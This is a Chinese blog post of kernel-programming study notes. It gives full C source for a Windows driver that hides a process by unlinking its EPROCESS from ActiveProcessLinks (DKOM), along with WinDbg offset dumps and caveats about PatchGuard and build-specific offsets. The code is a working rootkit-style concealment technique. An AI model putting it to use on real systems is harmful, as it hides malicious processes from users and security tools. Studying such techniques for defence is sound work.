  • ring0 进程隐藏实现

    最近在学习内核编程,记录一下最近的学习笔记。

    原理:从当前进程(DriverEntry 运行在 System 进程上下文)出发遍历 ActiveProcessLinks 双向链表,找到目标进程后把它的 EPROCESS 从链表中摘除(DKOM,直接修改内核对象)。

    效果:目标进程不再能被 WinDbg 的 !process 0 0、以及任何依赖该链表枚举进程的代码(例如 NtQuerySystemInformation)看见。注意:这种做法在 x64 上会被 PatchGuard 检测并触发蓝屏,且代码中的结构偏移只对特定 Windows 版本有效,仅用于学习。

    #include "HideProcess.h"
    
    #ifdef WIN64
    
    /* EPROCESS field offsets. These are NOT stable across Windows builds: the
     * x64 values match the `dt _eprocess` dump quoted inside HideProcess
     * (+0x188 ActiveProcessLinks, +0x2e0 ImageFileName, apparently a Windows 7
     * x64 target). On any other build they land in unrelated fields and the
     * driver reads or unlinks garbage -> bugcheck. Re-check with
     * `dt nt!_EPROCESS` on the target before loading. */
    #define ACTIVEPROCESSLINKS_EPROCESS  0x188
    #define IMAGEFILENAME_EPROCESS       0x2e0    /* UCHAR ImageFileName[15] per the kd dump below; not guaranteed NUL-terminated */
    #else
    
    /* x86 offsets, presumably for the matching 32-bit build; nothing in this
     * file verifies them -- TODO confirm with `dt nt!_EPROCESS` on the target. */
    #define ACTIVEPROCESSLINKS_EPROCESS  0x088
    #define IMAGEFILENAME_EPROCESS       0x174    /* UCHAR ImageFileName[15] -- TODO confirm on the x86 target */
    
    #endif
    
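    /*
     * DriverEntry - driver load entry point.
     *
     * Creates the control device and its symbolic link, installs
     * DefaultPassThrough for every IRP major function, registers the unload
     * routine, and then immediately tries to unlink the first process whose
     * image name contains "notepad.exe" (see HideProcess).
     *
     * DriverObject - driver object supplied by the I/O manager.
     * RegisterPath - registry path of the service key; unused here.
     *
     * Returns STATUS_SUCCESS, or the failure status of IoCreateDevice /
     * IoCreateSymbolicLink. If the symbolic link cannot be created the device
     * object is deleted again before returning, because the I/O manager does
     * not call DriverUnload when DriverEntry fails.
     */
    NTSTATUS
        DriverEntry(PDRIVER_OBJECT  DriverObject,PUNICODE_STRING  RegisterPath)
    {
        PDEVICE_OBJECT  DeviceObject = NULL;
        NTSTATUS        Status;
        int             i;
        UNICODE_STRING  DeviceName;
        UNICODE_STRING  LinkName;
    
        (void)RegisterPath;
    
        RtlInitUnicodeString(&DeviceName, DEVICE_NAME);
        RtlInitUnicodeString(&LinkName, LINK_NAME);
    
        /* Create the control device object. */
        Status = IoCreateDevice(DriverObject, 0, &DeviceName,
                                FILE_DEVICE_UNKNOWN, 0, FALSE, &DeviceObject);
        if (!NT_SUCCESS(Status))
        {
            return Status;
        }
    
        /* The original ignored this status and kept going with a device that
         * had no link; fail cleanly instead and release what was created. */
        Status = IoCreateSymbolicLink(&LinkName, &DeviceName);
        if (!NT_SUCCESS(Status))
        {
            IoDeleteDevice(DeviceObject);
            return Status;
        }
    
        /* MajorFunction has IRP_MJ_MAXIMUM_FUNCTION + 1 slots (indices 0 through
         * IRP_MJ_MAXIMUM_FUNCTION inclusive); the original `<` loop never set
         * the last one. */
        for (i = 0; i <= IRP_MJ_MAXIMUM_FUNCTION; i++)
        {
            DriverObject->MajorFunction[i] = DefaultPassThrough;
        }
    
        DriverObject->DriverUnload = UnloadDriver;
    
        /* Only meaningful if HideProcess reports "not found" as FALSE. */
        if (HideProcess("notepad.exe") == FALSE)
        {
            DbgPrint("No Exist\n");
        }
    
    #ifdef WIN64
    
        DbgPrint("WIN64: HideProcess IS RUNNING!!!");
    #else
    
        DbgPrint("WIN32: HideProcess SIS RUNNING!!!");
    
    #endif
    
        return STATUS_SUCCESS;
    }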
    
    /*
     * DefaultPassThrough - handler installed for every IRP major function.
     *
     * The driver exposes no real I/O interface, so every request is completed
     * at once with STATUS_SUCCESS and zero bytes transferred.
     *
     * DeviceObject - target device (ignored).
     * Irp          - the request to complete.
     *
     * Returns STATUS_SUCCESS.
     */
    NTSTATUS
        DefaultPassThrough(PDEVICE_OBJECT  DeviceObject,PIRP Irp)
    {
        const NTSTATUS Result = STATUS_SUCCESS;
    
        (void)DeviceObject;
    
        Irp->IoStatus.Information = 0;
        Irp->IoStatus.Status = Result;
        IoCompleteRequest(Irp, IO_NO_INCREMENT);
    
        return Result;
    }
    
    /*
     * UnloadDriver - driver unload routine.
     *
     * Removes the symbolic link, then deletes every device object hanging off
     * DriverObject. Note that nothing here re-links a process that HideProcess
     * removed from ActiveProcessLinks: the process stays unlinked after the
     * driver is gone.
     *
     * DriverObject - the driver being unloaded.
     */
    VOID
        UnloadDriver(PDRIVER_OBJECT DriverObject)
    {
        UNICODE_STRING  LinkName;
        PDEVICE_OBJECT  Device;
        PDEVICE_OBJECT  Next;
    
        RtlInitUnicodeString(&LinkName, LINK_NAME);
        IoDeleteSymbolicLink(&LinkName);
    
        for (Device = DriverObject->DeviceObject; Device != NULL; Device = Next)
        {
            /* Read the link before IoDeleteDevice frees the object. */
            Next = Device->NextDevice;
            IoDeleteDevice(Device);
        }
    
        DbgPrint("HideProcess IS STOPPED!!!");
    }
    
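    /* Size of the fixed EPROCESS.ImageFileName field; the kd dump below shows
     * `[15]`. The field is not guaranteed to be NUL-terminated. */
    enum { EPROCESS_IMAGE_NAME_BYTES = 15 };
    
    /*
     * CopyImageFileName - copy EPROCESS.ImageFileName into a NUL-terminated
     * local buffer so strstr/DbgPrint never read past the 15-byte field.
     *
     * Process - EPROCESS to read from.
     * Out     - receives at most 15 bytes plus the terminator.
     */
    static void CopyImageFileName(PEPROCESS Process,
                                  char Out[EPROCESS_IMAGE_NAME_BYTES + 1])
    {
        memcpy(Out, (const UINT8*)Process + IMAGEFILENAME_EPROCESS,
               EPROCESS_IMAGE_NAME_BYTES);
        Out[EPROCESS_IMAGE_NAME_BYTES] = '\0';
    }
    
    /*
     * HideProcess - unlink the first process whose image name contains
     * ProcessImageName (substring match via strstr, so "notepad.exe" also
     * matches "xnotepad.exe") from the kernel's ActiveProcessLinks list.
     *
     * The offsets used come from this WinDbg session:
     *
     *   kd> !process 0 0
     *   PROCESS fffffa8031ec9060
     *   SessionId: 1  Cid: 073c    Peb: 7fffffdf000  ParentCid: 06f8
     *   DirBase: 7fb21000  ObjectTable: fffff8a001ea3600  HandleCount: 545.
     *   Image: explorer.exe
     *   kd> dt _eprocess fffffa8031ec9060
     *   +0x000 Pcb              : _KPROCESS
     *   +0x180 UniqueProcessId  : 0x00000000`0000073c Void
     *   +0x188 ActiveProcessLinks : _LIST_ENTRY [ 0xfffffa80`31aeb1e8 - 0xfffffa80`3265da98 ]
     *   kd> dt _LIST_ENTRY
     *   +0x000 Flink            : Ptr64 _LIST_ENTRY    (next entry)
     *   +0x008 Blink            : Ptr64 _LIST_ENTRY    (previous entry)
     *   kd> dt _eprocess 0xfffffa80`31aeb1e8-0x188
     *   +0x188 ActiveProcessLinks : _LIST_ENTRY [ 0xfffffa80`31ec84d8 - 0xfffffa80`31ec91e8 ]
     *   +0x2e0 ImageFileName    : [15]  "vmtoolsd.exe"
     *
     *   list layout: [list head][System][...][Explorer][vmtoolsd]
     *
     * ProcessImageName - NUL-terminated substring to look for.
     *
     * Returns TRUE when a matching process was unlinked; FALSE when
     * ProcessImageName is NULL, the current process cannot be obtained, or no
     * image name matched. (The original returned TRUE even when nothing
     * matched, so DriverEntry's "No Exist" message could never fire.)
     *
     * Fixes relative to the original:
     *  - The first DbgPrint computed ImageFileName from `v1` while `v1` was
     *    still NULL, i.e. it dereferenced address 0x2e0 / 0x174.
     *  - ImageFileName is copied into a bounded buffer before strstr/DbgPrint.
     *  - After RemoveEntryList the orphaned entry is pointed at itself; with
     *    the stale Flink/Blink left by RemoveEntryList, the kernel's own unlink
     *    when the hidden process exits would write into its former neighbours
     *    and corrupt the list (the usual DKOM precaution).
     *
     * Caveats that are NOT fixed here (the required symbols are not exported):
     *  - The walk starts at the current process and stops at its predecessor,
     *    treating that predecessor as the non-EPROCESS list head. That only
     *    holds when the caller runs in the System process, i.e. from
     *    DriverEntry. From any other context one real process is skipped and
     *    the list head is read as if it were an EPROCESS.
     *  - The list is traversed and modified without PspActiveProcessLock, so
     *    a concurrent process create/exit races with this code.
     *  - On x64 PatchGuard monitors this list; an unlinked entry can lead to
     *    bugcheck 0x109 (CRITICAL_STRUCTURE_CORRUPTION).
     *  - The field offsets are hard-coded for one OS build.
     */
    BOOLEAN HideProcess(char* ProcessImageName)
    {
        PLIST_ENTRY  ListEntry = NULL;
        PEPROCESS    EProcess = NULL;
        PEPROCESS    Cursor = NULL;
        PEPROCESS    ListHead = NULL;
        char         ImageName[EPROCESS_IMAGE_NAME_BYTES + 1];
    
        if (ProcessImageName == NULL)
        {
            return FALSE;
        }
    
        EProcess = PsGetCurrentProcess();
        if (EProcess == NULL)
        {
            return FALSE;
        }
    
        CopyImageFileName(EProcess, ImageName);
        DbgPrint("CurrentImageFileName:%s\n", ImageName);
    
        /* Blink of the current process is assumed to be the list head (true
         * when running as System; see the caveats above). The head is not an
         * EPROCESS, so it must never be examined. */
        ListEntry = (PLIST_ENTRY)((UINT8*)EProcess + ACTIVEPROCESSLINKS_EPROCESS);
        ListHead  = (PEPROCESS)((ULONG_PTR)ListEntry->Blink - ACTIVEPROCESSLINKS_EPROCESS);
    
        for (Cursor = EProcess; Cursor != ListHead; )
        {
            ListEntry = (PLIST_ENTRY)((ULONG_PTR)Cursor + ACTIVEPROCESSLINKS_EPROCESS);
            CopyImageFileName(Cursor, ImageName);
    
            if (strstr(ImageName, ProcessImageName) != NULL)
            {
                RemoveEntryList(ListEntry);
                /* Self-link so a later RemoveEntryList on this entry (done by
                 * the kernel at process exit) becomes a harmless no-op. */
                ListEntry->Flink = ListEntry;
                ListEntry->Blink = ListEntry;
                return TRUE;
            }
    
            Cursor = (PEPROCESS)((ULONG_PTR)ListEntry->Flink - ACTIVEPROCESSLINKS_EPROCESS);
        }
    
        return FALSE;
    }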
  • 原文地址:https://www.cnblogs.com/HsinTsao/p/7427700.html